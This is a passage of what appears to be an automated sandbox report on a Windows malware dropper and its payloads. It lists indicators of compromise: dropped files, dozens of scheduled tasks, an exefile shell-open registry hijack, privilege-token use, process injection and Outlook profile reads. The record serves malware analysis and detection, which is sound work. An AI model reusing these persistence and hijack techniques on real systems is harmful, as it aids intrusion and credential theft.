for modification C:\Windows\directx.sys svchost.com File created C:\Windows\Tasks\Dctooux.job Conhost.exe File created C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\pris\taskhostw.exe find.exe File opened for modification C:\Windows\directx.sys svchost.com File opened for modification C:\Windows\svchost.com stub.exe File opened for modification C:\Windows\svchost.com svchost.com File opened for modification C:\Windows\directx.sys stub.exe File opened for modification C:\Windows\svchost.com svchost.com File opened for modification C:\Windows\directx.sys stub.exe File created C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\pris\ea9f0e6c9e2dcd find.exe File opened for modification C:\Windows\svchost.com svchost.com File opened for modification C:\Windows\directx.sys svchost.com File opened for modification C:\Windows\directx.sys svchost.com File opened for modification C:\Windows\directx.sys stub.exe File opened for modification C:\Windows\svchost.com svchost.com File opened for modification C:\Windows\directx.sys svchost.com File opened for modification C:\Windows\svchost.com svchost.com File opened for modification C:\Windows\svchost.com svchost.com File opened for modification C:\Windows\directx.sys svchost.com File opened for modification C:\Windows\directx.sys svchost.com File opened for modification C:\Windows\svchost.com svchost.com File opened for modification C:\Windows\directx.sys svchost.com File opened for modification C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\pris\RCX8F2C.tmp find.exe File opened for modification C:\Windows\directx.sys svchost.com File opened for modification C:\Windows\svchost.com stub.exe File opened for modification C:\Windows\svchost.com stub.exe File opened for modification C:\Windows\svchost.com svchost.com File opened for modification C:\Windows\svchost.com stub.exe File opened for modification C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\pris\taskhostw.exe find.exe File opened for modification C:\Windows\directx.sys svchost.com File opened for modification C:\Windows\directx.sys stub.exe File opened for modification C:\Windows\directx.sys stub.exe File created C:\Windows\svchost.exe stub.exe File opened for modification C:\Windows\svchost.com stub.exe File opened for modification C:\Windows\svchost.com svchost.com File opened for modification C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\pris\RCX8F2D.tmp find.exe File opened for modification C:\Windows\directx.sys stub.exe File opened for modification C:\Windows\svchost.com stub.exe File opened for modification C:\Windows\directx.sys stub.exe File opened for modification C:\Windows\directx.sys svchost.com File opened for modification C:\Windows\directx.sys stub.exe File opened for modification C:\Windows\svchost.com svchost.com File opened for modification C:\Windows\directx.sys svchost.com File opened for modification C:\Windows\svchost.com stub.exe File opened for modification C:\Windows\svchost.com stub.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exepid process 1652 sc.exe 5576 sc.exe 5616 sc.exe 5972 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 8 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 2500 1332 WerFault.exe NBYS%20AH.NET.exe 1692 4960 WerFault.exe InstallSetup.exe 4272 1692 WerFault.exe minuscrypt_crypted.exe 848 2644 WerFault.exe 2-3-1_2023-12-14_13-35.exe 5596 1676 WerFault.exe WatchDog.exe 1804 5168 WerFault.exe tel.exe 5972 3044 WerFault.exe jjj.exe 2864 3968 WerFault.exe u3ts.0.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
u3ts.0.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 u3ts.0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString u3ts.0.exe -
Creates scheduled task(s) 1 TTPs 41 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
SCHTASKS.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 1300 SCHTASKS.exe 2628 schtasks.exe 244 schtasks.exe 4252 schtasks.exe 464 schtasks.exe 4432 schtasks.exe 4868 schtasks.exe 1884 schtasks.exe 3168 schtasks.exe 3976 schtasks.exe 2484 schtasks.exe 3420 schtasks.exe 2628 schtasks.exe 2848 schtasks.exe 620 schtasks.exe 1092 schtasks.exe 1724 schtasks.exe 1544 schtasks.exe 3148 schtasks.exe 3132 schtasks.exe 3848 schtasks.exe 2380 schtasks.exe 4680 schtasks.exe 544 schtasks.exe 4092 schtasks.exe 5088 schtasks.exe 1724 schtasks.exe 844 schtasks.exe 3112 schtasks.exe 1304 schtasks.exe 2544 schtasks.exe 4636 schtasks.exe 1464 schtasks.exe 4272 schtasks.exe 3472 schtasks.exe 4248 schtasks.exe 3260 schtasks.exe 4800 schtasks.exe 2784 schtasks.exe 4464 schtasks.exe 2172 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 4364 timeout.exe -
Kills process with taskkill 5 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 5836 taskkill.exe 1580 taskkill.exe 5300 taskkill.exe 3120 taskkill.exe 5804 taskkill.exe -
Processes:
explorer.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Software\Microsoft\Internet Explorer\Toolbar explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" explorer.exe Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 explorer.exe -
Modifies registry class 53 IoCs
Processes:
explorer.exefind.exesvchost.comstub.exestub.exestub.exestub.exe15C633~1.EXEcmd.exestub.exeOpolis.exestub.exestub.exestub.exe4363463463464363463463463.exestub.exepowershell.exestub.exe4363463463464363463463463.exedescription ioc process Set value (data) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\MRUListEx = 00000000ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = 00000000ffffffff explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0 = 56003100000000003d586d621000526f616d696e6700400009000400efbe965774b13d586e622e00000084e10100000001000000000000000000000000000000ca995c0052006f0061006d0069006e006700000016000000 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0\MRUListEx = ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 explorer.exe Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings find.exe Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings svchost.com Set value (data) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0 = 5600310000000000965774b112004170704461746100400009000400efbe965774b13d5865622e00000083e1010000000100000000000000000000000000000055a654004100700070004400610074006100000016000000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings stub.exe Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings stub.exe Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings stub.exe Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings stub.exe Set value (data) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\MRUListEx = 00000000ffffffff explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0\NodeSlot = "1" explorer.exe Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings 15C633~1.EXE Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 explorer.exe Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings cmd.exe Set value (data) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots explorer.exe Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings stub.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Opolis.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" stub.exe Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0 explorer.exe Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell explorer.exe Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings stub.exe Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 explorer.exe Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 7800310000000000965774b11100557365727300640009000400efbe874f77483d5865622e000000c70500000000010000000000000000003a00000000000df4620055007300650072007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100380031003300000014000000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings stub.exe Set value (data) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 explorer.exe Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings 4363463463464363463463463.exe Set value (data) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 = 5000310000000000965783b9100041646d696e003c0009000400efbe965774b13d5865622e00000078e101000000010000000000000000000000000000008c45d500410064006d0069006e00000014000000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags explorer.exe Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings stub.exe Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings powershell.exe Set value (data) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\MRUListEx = 00000000ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0 explorer.exe Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings stub.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ explorer.exe Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 19002f433a5c000000000000000000000000000000000000000000 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0 = 5e003100000000003d586d6210004d4143524f4d7e310000460009000400efbe3d586d623d586d622e000000463202000000090000000000000000000000000000009a46ab004d006100630072006f006d006500640069006100000018000000 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic" explorer.exe Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings 4363463463464363463463463.exe Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 explorer.exe Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 explorer.exe -
Modifies registry key 1 TTPs 4 IoCs
Processes:
reg.exereg.exereg.exereg.exepid process 5828 reg.exe 5984 reg.exe 5892 reg.exe 5560 reg.exe -
Runs ping.exe 1 TTPs 4 IoCs
Processes:
PING.EXEPING.EXEPING.EXEPING.EXEpid process 2536 PING.EXE 2832 PING.EXE 3888 PING.EXE 5340 PING.EXE -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 200 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
first.exeexplorer.exepid process 2976 first.exe 3916 explorer.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
find.exepowershell.exesvchost1.exeConhost.exeAppLaunch.exepowershell.exepowershell.exepid process 3120 find.exe 3120 find.exe 3120 find.exe 3120 find.exe 3120 find.exe 3120 find.exe 3120 find.exe 3120 find.exe 3120 find.exe 3120 find.exe 3120 find.exe 3120 find.exe 3120 find.exe 3120 find.exe 3120 find.exe 3120 find.exe 3120 find.exe 3120 find.exe 3120 find.exe 5044 powershell.exe 5044 powershell.exe 5044 powershell.exe 3120 find.exe 1636 svchost1.exe 1636 svchost1.exe 1636 svchost1.exe 3120 find.exe 3120 find.exe 3120 find.exe 4244 Conhost.exe 4244 Conhost.exe 4244 Conhost.exe 3120 find.exe 3120 find.exe 3120 find.exe 3120 find.exe 3120 find.exe 3120 find.exe 3120 find.exe 1636 svchost1.exe 3120 find.exe 3120 find.exe 3120 find.exe 3132 AppLaunch.exe 3132 AppLaunch.exe 3120 find.exe 3120 find.exe 3120 find.exe 3120 find.exe 3120 find.exe 3120 find.exe 3120 find.exe 3120 find.exe 3120 find.exe 3120 find.exe 3120 find.exe 3120 find.exe 3120 find.exe 3120 find.exe 3120 find.exe 1336 powershell.exe 1336 powershell.exe 1832 powershell.exe 1832 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
OSM-Client.exepid process 3052 OSM-Client.exe -
Suspicious use of AdjustPrivilegeToken 38 IoCs
Processes:
4363463463464363463463463.execrypted.exefind.exefirst.exesvchost1.exepowershell.exeConhost.exeAppLaunch.exepowershell.exepowershell.exepowershell.exepowershell.exeConhost.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe4363463463464363463463463.exepowershell.exepowershell.exe4363463463464363463463463.exealex.exebuild1234.exeLogs.exeWatchDog.exeolehps.exeRegAsm.exeexplorer.exedescription pid process Token: SeDebugPrivilege 1328 4363463463464363463463463.exe Token: SeLoadDriverPrivilege 4276 crypted.exe Token: SeDebugPrivilege 3120 find.exe Token: SeDebugPrivilege 2976 first.exe Token: SeDebugPrivilege 1636 svchost1.exe Token: SeDebugPrivilege 5044 powershell.exe Token: SeDebugPrivilege 4244 Conhost.exe Token: SeDebugPrivilege 2976 first.exe Token: SeDebugPrivilege 3132 AppLaunch.exe Token: SeDebugPrivilege 1336 powershell.exe Token: SeDebugPrivilege 1832 powershell.exe Token: SeDebugPrivilege 2300 powershell.exe Token: SeDebugPrivilege 4272 powershell.exe Token: SeDebugPrivilege 4020 Conhost.exe Token: SeDebugPrivilege 3416 powershell.exe Token: SeDebugPrivilege 3772 powershell.exe Token: SeDebugPrivilege 2224 powershell.exe Token: SeDebugPrivilege 4964 powershell.exe Token: SeDebugPrivilege 3296 powershell.exe Token: SeDebugPrivilege 4336 powershell.exe Token: SeDebugPrivilege 4928 powershell.exe Token: SeDebugPrivilege 1348 powershell.exe Token: SeDebugPrivilege 5804 taskkill.exe Token: SeDebugPrivilege 5836 taskkill.exe Token: SeDebugPrivilege 3120 find.exe Token: SeDebugPrivilege 1580 taskkill.exe Token: SeDebugPrivilege 5300 taskkill.exe Token: SeDebugPrivilege 5184 4363463463464363463463463.exe Token: SeDebugPrivilege 3632 powershell.exe Token: SeDebugPrivilege 5272 powershell.exe Token: SeDebugPrivilege 5436 4363463463464363463463463.exe Token: SeDebugPrivilege 1732 alex.exe Token: SeDebugPrivilege 6108 build1234.exe Token: SeDebugPrivilege 5584 Logs.exe Token: SeDebugPrivilege 1676 WatchDog.exe Token: SeDebugPrivilege 6036 olehps.exe Token: SeDebugPrivilege 1800 RegAsm.exe Token: SeLockMemoryPrivilege 1400 explorer.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
networa.exeConhost.exepid process 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2948 Conhost.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
networa.exepid process 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe 2364 networa.exe -
Suspicious use of SetWindowsHookEx 8 IoCs
Processes:
Conhost.exeu3ts.1.exesvchost1.exeexplorer.exeDctooux.exepid process 2948 Conhost.exe 2948 Conhost.exe 3016 u3ts.1.exe 1636 svchost1.exe 3916 explorer.exe 3916 explorer.exe 4408 Dctooux.exe 4408 Dctooux.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
4363463463464363463463463.exepowershell.exeInstallSetup.execmd.execmd.exeofg7d45fsdfgg312.exeu3ts.1.exefirst.exedusers.execmd.exedescription pid process target process PID 1328 wrote to memory of 4276 1328 4363463463464363463463463.exe crypted.exe PID 1328 wrote to memory of 4276 1328 4363463463464363463463463.exe crypted.exe PID 1328 wrote to memory of 4276 1328 4363463463464363463463463.exe crypted.exe PID 1328 wrote to memory of 2364 1328 4363463463464363463463463.exe networa.exe PID 1328 wrote to memory of 2364 1328 4363463463464363463463463.exe networa.exe PID 1328 wrote to memory of 2364 1328 4363463463464363463463463.exe networa.exe PID 1328 wrote to memory of 2224 1328 4363463463464363463463463.exe powershell.exe PID 1328 wrote to memory of 2224 1328 4363463463464363463463463.exe powershell.exe PID 1328 wrote to memory of 2224 1328 4363463463464363463463463.exe powershell.exe PID 2224 wrote to memory of 5004 2224 powershell.exe cmd.exe PID 2224 wrote to memory of 5004 2224 powershell.exe cmd.exe PID 2224 wrote to memory of 5004 2224 powershell.exe cmd.exe PID 1328 wrote to memory of 1332 1328 4363463463464363463463463.exe Conhost.exe PID 1328 wrote to memory of 1332 1328 4363463463464363463463463.exe Conhost.exe PID 1328 wrote to memory of 1332 1328 4363463463464363463463463.exe Conhost.exe PID 1328 wrote to memory of 4960 1328 4363463463464363463463463.exe InstallSetup.exe PID 1328 wrote to memory of 4960 1328 4363463463464363463463463.exe InstallSetup.exe PID 1328 wrote to memory of 4960 1328 4363463463464363463463463.exe InstallSetup.exe PID 4960 wrote to memory of 3968 4960 InstallSetup.exe u3ts.0.exe PID 4960 wrote to memory of 3968 4960 InstallSetup.exe u3ts.0.exe PID 4960 wrote to memory of 3968 4960 InstallSetup.exe u3ts.0.exe PID 1328 wrote to memory of 1636 1328 4363463463464363463463463.exe svchost1.exe PID 1328 wrote to memory of 1636 1328 4363463463464363463463463.exe svchost1.exe PID 1328 wrote to memory of 2948 1328 4363463463464363463463463.exe Conhost.exe PID 1328 wrote to memory of 2948 1328 4363463463464363463463463.exe Conhost.exe PID 1328 wrote to memory of 2948 1328 4363463463464363463463463.exe Conhost.exe PID 5004 wrote to memory of 4936 5004 cmd.exe cmd.exe PID 5004 wrote to memory of 4936 5004 cmd.exe cmd.exe PID 5004 wrote to memory of 4936 5004 cmd.exe cmd.exe PID 4936 wrote to memory of 3120 4936 cmd.exe find.exe PID 4936 wrote to memory of 3120 4936 cmd.exe find.exe PID 1328 wrote to memory of 4072 1328 4363463463464363463463463.exe i.exe PID 1328 wrote to memory of 4072 1328 4363463463464363463463463.exe i.exe PID 1328 wrote to memory of 4072 1328 4363463463464363463463463.exe i.exe PID 1328 wrote to memory of 2976 1328 4363463463464363463463463.exe first.exe PID 1328 wrote to memory of 2976 1328 4363463463464363463463463.exe first.exe PID 4960 wrote to memory of 3016 4960 InstallSetup.exe u3ts.1.exe PID 4960 wrote to memory of 3016 4960 InstallSetup.exe u3ts.1.exe PID 4960 wrote to memory of 3016 4960 InstallSetup.exe u3ts.1.exe PID 1328 wrote to memory of 1356 1328 4363463463464363463463463.exe ofg7d45fsdfgg312.exe PID 1328 wrote to memory of 1356 1328 4363463463464363463463463.exe ofg7d45fsdfgg312.exe PID 1328 wrote to memory of 1356 1328 4363463463464363463463463.exe ofg7d45fsdfgg312.exe PID 1356 wrote to memory of 1300 1356 ofg7d45fsdfgg312.exe SCHTASKS.exe PID 1356 wrote to memory of 1300 1356 ofg7d45fsdfgg312.exe SCHTASKS.exe PID 1356 wrote to memory of 1300 1356 ofg7d45fsdfgg312.exe SCHTASKS.exe PID 1328 wrote to memory of 2876 1328 4363463463464363463463463.exe dusers.exe PID 1328 wrote to memory of 2876 1328 4363463463464363463463463.exe dusers.exe PID 1328 wrote to memory of 2876 1328 4363463463464363463463463.exe dusers.exe PID 3016 wrote to memory of 5004 3016 u3ts.1.exe cmd.exe PID 3016 wrote to memory of 5004 3016 u3ts.1.exe cmd.exe PID 3016 wrote to memory of 5004 3016 u3ts.1.exe cmd.exe PID 2976 wrote to memory of 5044 2976 first.exe powershell.exe PID 2976 wrote to memory of 5044 2976 first.exe powershell.exe PID 2876 wrote to memory of 1512 2876 dusers.exe cmd.exe PID 2876 wrote to memory of 1512 2876 dusers.exe cmd.exe PID 2876 wrote to memory of 1512 2876 dusers.exe cmd.exe PID 5004 wrote to memory of 2232 5004 cmd.exe chcp.com PID 5004 wrote to memory of 2232 5004 cmd.exe chcp.com PID 5004 wrote to memory of 2232 5004 cmd.exe chcp.com PID 1512 wrote to memory of 2648 1512 cmd.exe Users.exe PID 1512 wrote to memory of 2648 1512 cmd.exe Users.exe PID 1512 wrote to memory of 2648 1512 cmd.exe Users.exe PID 5004 wrote to memory of 244 5004 cmd.exe wmild.exe PID 5004 wrote to memory of 244 5004 cmd.exe wmild.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
Processes:
build1234.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 build1234.exe -
outlook_win_path 1 IoCs
Processes:
build1234.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 build1234.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe"C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe"2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
